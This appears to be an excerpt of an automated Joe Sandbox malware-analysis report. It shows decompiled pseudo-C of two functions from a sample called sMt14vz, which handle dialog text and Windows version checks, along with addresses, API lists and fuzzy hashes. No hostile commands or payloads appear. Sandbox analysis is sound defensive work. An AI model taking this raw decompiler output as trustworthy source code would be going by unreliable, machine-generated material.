                                                                                                                                                                                                                                            					E010D43D0(_t34, _t15);
                                                                                                                                                                                                                                            					_v520 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0x10d9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                            					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if(_t14 != 1) {
                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t32 = _a12;
                                                                                                                                                                                                                                            						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							_t23 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x010d19e0
                                                                                                                                                                                                                                            0x010d19e0
                                                                                                                                                                                                                                            0x010d19eb
                                                                                                                                                                                                                                            0x010d19f2
                                                                                                                                                                                                                                            0x010d19f9
                                                                                                                                                                                                                                            0x010d19fc
                                                                                                                                                                                                                                            0x010d1a01
                                                                                                                                                                                                                                            0x010d1a2a
                                                                                                                                                                                                                                            0x010d1a2e
                                                                                                                                                                                                                                            0x010d1a3e
                                                                                                                                                                                                                                            0x010d1a4f
                                                                                                                                                                                                                                            0x010d1a62
                                                                                                                                                                                                                                            0x010d1a6a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1a03
                                                                                                                                                                                                                                            0x010d1a06
                                                                                                                                                                                                                                            0x010d1a20
                                                                                                                                                                                                                                            0x010d1a20
                                                                                                                                                                                                                                            0x010d1a08
                                                                                                                                                                                                                                            0x010d1a08
                                                                                                                                                                                                                                            0x010d1a14
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1a16
                                                                                                                                                                                                                                            0x010d1a18
                                                                                                                                                                                                                                            0x010d1a70
                                                                                                                                                                                                                                            0x010d1a72
                                                                                                                                                                                                                                            0x010d1a72
                                                                                                                                                                                                                                            0x010d1a14
                                                                                                                                                                                                                                            0x010d1a06
                                                                                                                                                                                                                                            0x010d1a81

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 010D1A18
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 010D1A24
                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 010D1A4F
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 010D1A62
                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 010D1A6A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                            • Opcode ID: d7fa130e327a9071497ff925ecb89134af7aa0d6b0df26bfd28b568b04eb8fe7
                                                                                                                                                                                                                                            • Instruction ID: ebaf1d70772a39f89c8d54c1f984b33c8d43b2655ecd1da68270f319b5850cab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7fa130e327a9071497ff925ecb89134af7aa0d6b0df26bfd28b568b04eb8fe7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02118E3160121AABDB20EF78D908AAE77F8EB49250F008195F99293185DE359E01CB96
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E010D36EE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                                                                                            				CHAR* _v428;
                                                                                                                                                                                                                                            				CHAR* _v432;
                                                                                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                                                                                            				CHAR* _v440;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                                            				CHAR* _t77;
                                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                                            				CHAR* _t94;
                                                                                                                                                                                                                                            				int _t97;
                                                                                                                                                                                                                                            				CHAR* _t98;
                                                                                                                                                                                                                                            				signed char _t99;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				signed short _t107;
                                                                                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                                                                                            				short _t113;
                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                            				signed char _t115;
                                                                                                                                                                                                                                            				short _t119;
                                                                                                                                                                                                                                            				CHAR* _t123;
                                                                                                                                                                                                                                            				CHAR* _t124;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				CHAR* _t138;
                                                                                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t72 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                            				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            				_t115 = __ecx;
                                                                                                                                                                                                                                            				_t135 = 0;
                                                                                                                                                                                                                                            				_v432 = __ecx;
                                                                                                                                                                                                                                            				_t138 = 0;
                                                                                                                                                                                                                                            				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                            					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                            					_t119 = 2;
                                                                                                                                                                                                                                            					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                            					__eflags = _t77;
                                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                                            						_t119 = 0;
                                                                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                                                                            						 *0x10d8184 = 1;
                                                                                                                                                                                                                                            						 *0x10d8180 = 1;
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						 *0x10d9a40 = _t119;
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						__eflags =  *0x10d8a34 - _t138; // 0x0
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t115;
                                                                                                                                                                                                                                            						if(_t115 == 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v428 = _t135;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                            						_t11 =  &_v420;
                                                                                                                                                                                                                                            						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                            						__eflags =  *_t11;
                                                                                                                                                                                                                                            						_v440 = _t115;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                            							_v436 = E010D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                            							_t91 = E010D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                            							_t123 = _v436;
                                                                                                                                                                                                                                            							_t133 = 0x54d;
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 < 0) {
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								__eflags = _v420 - 1;
                                                                                                                                                                                                                                            								if(_v420 == 1) {
                                                                                                                                                                                                                                            									_t138 = 0x54c;
                                                                                                                                                                                                                                            									L36:
                                                                                                                                                                                                                                            									__eflags = _t138;
                                                                                                                                                                                                                                            									if(_t138 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            										if(_t138 == _t133) {
                                                                                                                                                                                                                                            											L30:
                                                                                                                                                                                                                                            											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                            											_t115 = 0;
                                                                                                                                                                                                                                            											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                            											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            											_t133 = _v432;
                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                            												_t124 = _v440;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                            												_v420 =  &_v268;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t124;
                                                                                                                                                                                                                                            											if(_t124 == 0) {
                                                                                                                                                                                                                                            												_t135 = _v436;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t99 = _t124[0x30];
                                                                                                                                                                                                                                            												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                            												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                            												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                            													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t115 = 0x104;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x10d8a38 & 0x00000001;
                                                                                                                                                                                                                                            											if(( *0x10d8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            												L64:
                                                                                                                                                                                                                                            												_push(0);
                                                                                                                                                                                                                                            												_push(0x30);
                                                                                                                                                                                                                                            												_push(_v420);
                                                                                                                                                                                                                                            												_push(0x10d9154);
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												__eflags = _t135;
                                                                                                                                                                                                                                            												if(_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												__eflags =  *_t135;
                                                                                                                                                                                                                                            												if( *_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												MessageBeep(0);
                                                                                                                                                                                                                                            												_t94 = E010D681F(_t115);
                                                                                                                                                                                                                                            												__eflags = _t94;
                                                                                                                                                                                                                                            												if(_t94 == 0) {
                                                                                                                                                                                                                                            													L57:
                                                                                                                                                                                                                                            													0x180030 = 0x30;
                                                                                                                                                                                                                                            													L58:
                                                                                                                                                                                                                                            													_t97 = MessageBoxA(0, _t135, 0x10d9154, 0x00180030 | _t115);
                                                                                                                                                                                                                                            													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                            													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                            														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                            														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            															goto L66;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														__eflags = _t97 - 1;
                                                                                                                                                                                                                                            														L62:
                                                                                                                                                                                                                                            														if(__eflags == 0) {
                                                                                                                                                                                                                                            															_t138 = 0;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L66;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													__eflags = _t97 - 6;
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t98 = E010D67C9(_t124, _t124);
                                                                                                                                                                                                                                            												__eflags = _t98;
                                                                                                                                                                                                                                            												if(_t98 == 0) {
                                                                                                                                                                                                                                            													goto L57;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                            										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                            											goto L30;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138;
                                                                                                                                                                                                                                            										if(_t138 == 0) {
                                                                                                                                                                                                                                            											goto L66;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t135 = 0;
                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                            										goto L44;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L37:
                                                                                                                                                                                                                                            									_t129 = _v432;
                                                                                                                                                                                                                                            									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                            									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t133 =  &_v268;
                                                                                                                                                                                                                                            									_t104 = E010D28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                            									__eflags = _t104;
                                                                                                                                                                                                                                            									if(_t104 != 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t135 = _v428;
                                                                                                                                                                                                                                            									_t133 = 0x54d;
                                                                                                                                                                                                                                            									_t138 = 0x54d;
                                                                                                                                                                                                                                            									goto L40;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							if(_t91 > 0) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 != 0) {
                                                                                                                                                                                                                                            								__eflags = _t91;
                                                                                                                                                                                                                                            								if(_t91 != 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                            								__eflags = _t135;
                                                                                                                                                                                                                                            								if(_t135 == 0) {
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t138 = 0x54c;
                                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                            							if(_t91 != 0) {
                                                                                                                                                                                                                                            								_t131 = _v424;
                                                                                                                                                                                                                                            								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                            								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                            							_t109 = _v424;
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                            							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                                            							L33:
                                                                                                                                                                                                                                            							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                            							_v428 = _t135;
                                                                                                                                                                                                                                            							_v420 = _t135;
                                                                                                                                                                                                                                            							__eflags = _t135 - 2;
                                                                                                                                                                                                                                            						} while (_t135 < 2);
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t77 == 1;
                                                                                                                                                                                                                                            					if(_t77 == 1) {
                                                                                                                                                                                                                                            						 *0x10d9a40 = _t119;
                                                                                                                                                                                                                                            						 *0x10d8184 = 1;
                                                                                                                                                                                                                                            						 *0x10d8180 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - 3;
                                                                                                                                                                                                                                            						if(_t133 > 3) {
                                                                                                                                                                                                                                            							__eflags = _t133 - 5;
                                                                                                                                                                                                                                            							if(_t133 < 5) {
                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t113 = 3;
                                                                                                                                                                                                                                            							_t119 = _t113;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t119 = 1;
                                                                                                                                                                                                                                            						_t114 = 3;
                                                                                                                                                                                                                                            						 *0x10d9a40 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0x10d8184 = _t135;
                                                                                                                                                                                                                                            							 *0x10d8180 = _t135;
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                            						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t138 = 0x4ca;
                                                                                                                                                                                                                                            					goto L44;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t138 = 0x4b4;
                                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					L65:
                                                                                                                                                                                                                                            					_t133 = _t138;
                                                                                                                                                                                                                                            					E010D44B9(0, _t138);
                                                                                                                                                                                                                                            					L66:
                                                                                                                                                                                                                                            					return E010D6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x010d36f9
                                                                                                                                                                                                                                            0x010d3700
                                                                                                                                                                                                                                            0x010d370c
                                                                                                                                                                                                                                            0x010d3716
                                                                                                                                                                                                                                            0x010d3718
                                                                                                                                                                                                                                            0x010d371b
                                                                                                                                                                                                                                            0x010d3721
                                                                                                                                                                                                                                            0x010d372b
                                                                                                                                                                                                                                            0x010d373d
                                                                                                                                                                                                                                            0x010d3745
                                                                                                                                                                                                                                            0x010d3746
                                                                                                                                                                                                                                            0x010d3746
                                                                                                                                                                                                                                            0x010d3749
                                                                                                                                                                                                                                            0x010d37ab
                                                                                                                                                                                                                                            0x010d37ad
                                                                                                                                                                                                                                            0x010d37ae
                                                                                                                                                                                                                                            0x010d37b3
                                                                                                                                                                                                                                            0x010d37b8
                                                                                                                                                                                                                                            0x010d37b8
                                                                                                                                                                                                                                            0x010d37bf
                                                                                                                                                                                                                                            0x010d37bf
                                                                                                                                                                                                                                            0x010d37c5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d37cb
                                                                                                                                                                                                                                            0x010d37cd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d37d5
                                                                                                                                                                                                                                            0x010d37db
                                                                                                                                                                                                                                            0x010d37e8
                                                                                                                                                                                                                                            0x010d37ea
                                                                                                                                                                                                                                            0x010d37ea
                                                                                                                                                                                                                                            0x010d37ea
                                                                                                                                                                                                                                            0x010d37f0
                                                                                                                                                                                                                                            0x010d37f6
                                                                                                                                                                                                                                            0x010d3805
                                                                                                                                                                                                                                            0x010d3817
                                                                                                                                                                                                                                            0x010d382b
                                                                                                                                                                                                                                            0x010d3830
                                                                                                                                                                                                                                            0x010d3836
                                                                                                                                                                                                                                            0x010d383b
                                                                                                                                                                                                                                            0x010d383d
                                                                                                                                                                                                                                            0x010d38eb
                                                                                                                                                                                                                                            0x010d38eb
                                                                                                                                                                                                                                            0x010d38f2
                                                                                                                                                                                                                                            0x010d390c
                                                                                                                                                                                                                                            0x010d3911
                                                                                                                                                                                                                                            0x010d3911
                                                                                                                                                                                                                                            0x010d3913
                                                                                                                                                                                                                                            0x010d394d
                                                                                                                                                                                                                                            0x010d394d
                                                                                                                                                                                                                                            0x010d394f
                                                                                                                                                                                                                                            0x010d38a9
                                                                                                                                                                                                                                            0x010d38a9
                                                                                                                                                                                                                                            0x010d38b0
                                                                                                                                                                                                                                            0x010d38b2
                                                                                                                                                                                                                                            0x010d38b9
                                                                                                                                                                                                                                            0x010d38bb
                                                                                                                                                                                                                                            0x010d38c1
                                                                                                                                                                                                                                            0x010d3975
                                                                                                                                                                                                                                            0x010d38c7
                                                                                                                                                                                                                                            0x010d38de
                                                                                                                                                                                                                                            0x010d38e0
                                                                                                                                                                                                                                            0x010d38e0
                                                                                                                                                                                                                                            0x010d397b
                                                                                                                                                                                                                                            0x010d397d
                                                                                                                                                                                                                                            0x010d39a9
                                                                                                                                                                                                                                            0x010d397f
                                                                                                                                                                                                                                            0x010d3982
                                                                                                                                                                                                                                            0x010d398b
                                                                                                                                                                                                                                            0x010d398d
                                                                                                                                                                                                                                            0x010d398f
                                                                                                                                                                                                                                            0x010d399f
                                                                                                                                                                                                                                            0x010d39a1
                                                                                                                                                                                                                                            0x010d3991
                                                                                                                                                                                                                                            0x010d3991
                                                                                                                                                                                                                                            0x010d3991
                                                                                                                                                                                                                                            0x010d398f
                                                                                                                                                                                                                                            0x010d39af
                                                                                                                                                                                                                                            0x010d39b6
                                                                                                                                                                                                                                            0x010d3a0f
                                                                                                                                                                                                                                            0x010d3a0f
                                                                                                                                                                                                                                            0x010d3a11
                                                                                                                                                                                                                                            0x010d3a13
                                                                                                                                                                                                                                            0x010d3a19
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d39b8
                                                                                                                                                                                                                                            0x010d39b8
                                                                                                                                                                                                                                            0x010d39ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d39bc
                                                                                                                                                                                                                                            0x010d39bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d39c3
                                                                                                                                                                                                                                            0x010d39c9
                                                                                                                                                                                                                                            0x010d39ce
                                                                                                                                                                                                                                            0x010d39d0
                                                                                                                                                                                                                                            0x010d39e3
                                                                                                                                                                                                                                            0x010d39e5
                                                                                                                                                                                                                                            0x010d39e6
                                                                                                                                                                                                                                            0x010d39f1
                                                                                                                                                                                                                                            0x010d39f7
                                                                                                                                                                                                                                            0x010d39fa
                                                                                                                                                                                                                                            0x010d3a01
                                                                                                                                                                                                                                            0x010d3a04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3a06
                                                                                                                                                                                                                                            0x010d3a09
                                                                                                                                                                                                                                            0x010d3a09
                                                                                                                                                                                                                                            0x010d3a0b
                                                                                                                                                                                                                                            0x010d3a0b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3a09
                                                                                                                                                                                                                                            0x010d39fc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d39fc
                                                                                                                                                                                                                                            0x010d39d3
                                                                                                                                                                                                                                            0x010d39d8
                                                                                                                                                                                                                                            0x010d39da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d39dc
                                                                                                                                                                                                                                            0x010d39b6
                                                                                                                                                                                                                                            0x010d3955
                                                                                                                                                                                                                                            0x010d395b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3961
                                                                                                                                                                                                                                            0x010d3963
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3969
                                                                                                                                                                                                                                            0x010d3969
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3969
                                                                                                                                                                                                                                            0x010d3915
                                                                                                                                                                                                                                            0x010d3915
                                                                                                                                                                                                                                            0x010d391b
                                                                                                                                                                                                                                            0x010d391f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d392d
                                                                                                                                                                                                                                            0x010d3933
                                                                                                                                                                                                                                            0x010d3938
                                                                                                                                                                                                                                            0x010d393a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3940
                                                                                                                                                                                                                                            0x010d3946
                                                                                                                                                                                                                                            0x010d394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d38f2
                                                                                                                                                                                                                                            0x010d3843
                                                                                                                                                                                                                                            0x010d3845
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d384b
                                                                                                                                                                                                                                            0x010d384d
                                                                                                                                                                                                                                            0x010d3883
                                                                                                                                                                                                                                            0x010d3885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d389a
                                                                                                                                                                                                                                            0x010d389e
                                                                                                                                                                                                                                            0x010d389e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d38a0
                                                                                                                                                                                                                                            0x010d38a0
                                                                                                                                                                                                                                            0x010d38a2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d38a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d38a4
                                                                                                                                                                                                                                            0x010d384f
                                                                                                                                                                                                                                            0x010d3851
                                                                                                                                                                                                                                            0x010d3857
                                                                                                                                                                                                                                            0x010d386e
                                                                                                                                                                                                                                            0x010d3877
                                                                                                                                                                                                                                            0x010d387b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3881
                                                                                                                                                                                                                                            0x010d3859
                                                                                                                                                                                                                                            0x010d385c
                                                                                                                                                                                                                                            0x010d3862
                                                                                                                                                                                                                                            0x010d3866
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3868
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d38f4
                                                                                                                                                                                                                                            0x010d38f4
